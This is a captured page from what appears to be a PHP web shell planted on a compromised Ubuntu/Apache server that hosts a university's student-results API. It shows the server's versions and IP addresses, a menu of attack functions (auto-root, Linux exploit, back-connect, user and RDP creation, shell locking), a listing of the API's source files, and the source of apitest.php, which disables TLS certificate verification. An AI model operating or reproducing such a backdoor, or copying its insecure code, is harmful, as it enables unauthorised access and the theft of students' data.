Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.153.110
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
revaapi /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
apitest.php
1.61
KB
-rw-rw-r--
attendaceSEE.php
2.61
KB
-rwxr-xr-x
caccesscontext.php
1.28
KB
-rwxr-xr-x
cappcontext.php
2.71
KB
-rwxr-xr-x
coutput.php
1.84
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
548
B
-rwxr-xr-x
cuser.php
3.53
KB
-rwxr-xr-x
downloadStudHalltiket.php
2.53
KB
-rw-rw-r--
downloadStudPhoto.php
416
B
-rw-rw-r--
ePRTimetable.php
2.68
KB
-rwxr-xr-x
eRoomAllotmentData.php
2.88
KB
-rwxr-xr-x
eThTimetable.php
2.64
KB
-rwxr-xr-x
edegree.php
2.5
KB
-rwxr-xr-x
esubject.php
4.31
KB
-rwxr-xr-x
genToken.php
790
B
-rw-rw-r--
getexamevent.php
3.41
KB
-rwxr-xr-x
json.php
34.52
KB
-rwxr-xr-x
jssstuMarksAPI.php
2.21
KB
-rw-r--r--
mregistry.php
1.87
KB
-rwxr-xr-x
profile.php
938
B
-rwxr-xr-x
sduvaldata.php
2.57
KB
-rw-r--r--
studentExamFee.php
7.53
KB
-rw-rw-r--
studentResults.php
4.94
KB
-rw-rw-r--
studentia.php
4.5
KB
-rw-rw-r--
studentprofile.php
6.87
KB
-rw-rw-r--
studentsubject.php
5.15
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : apitest.php
<?php function apitest($aobj_context) { include("genToken.php"); include("const.php"); $tokenArry = getToken(client_id,client_secret,username,password,grant_type); $tokendet = json_decode($tokenArry,true); $token = $tokendet['access_token']; $iurl = $tokendet['instance_url']; $username = username; $password = password; $hbody = 'Basic '.base64_encode((username.':'.password)); $headers = array ( "Authorization:Bearer $token", "Content-Type: application/json" ); $studData = array( array( "regno"=>"A181002", "sem"=>"1", "ExaminationMonthYear"=>"Dec 2021/ Jan 2022", "subcode"=>"A0011", "subname"=>"subject name", "securedIAMarks"=>"20", "securedExternalMarks"=>"60", "credits"=>"1.4", "gradepoint"=>"11", "creditpoint"=>"1", "cgpa"=>"7.7", "sgpa"=>"9.1", "grade"=>"A", "Result"=>"Pass", "remarks"=>"Note: REVA University is not responsible for any inadvertent error that may have crept in the results being published on NET. The results published on net are for immediate information to the examinees. These cannot be treated as original mark sheets." ) ); $req['MarksDetails'] = $studData; $url = $iurl."/services/apexrest/studentresults"; $ch = curl_init(); curl_setopt( $ch,CURLOPT_URL, $url); curl_setopt( $ch,CURLOPT_POST, true ); curl_setopt( $ch,CURLOPT_HTTPHEADER, $headers ); curl_setopt( $ch,CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch,CURLOPT_SSL_VERIFYPEER, false ); curl_setopt( $ch,CURLOPT_POSTFIELDS, json_encode( $req ) ); $result2 = curl_exec($ch); var_dump($result2); die(); curl_close( $ch ); } ?>
Close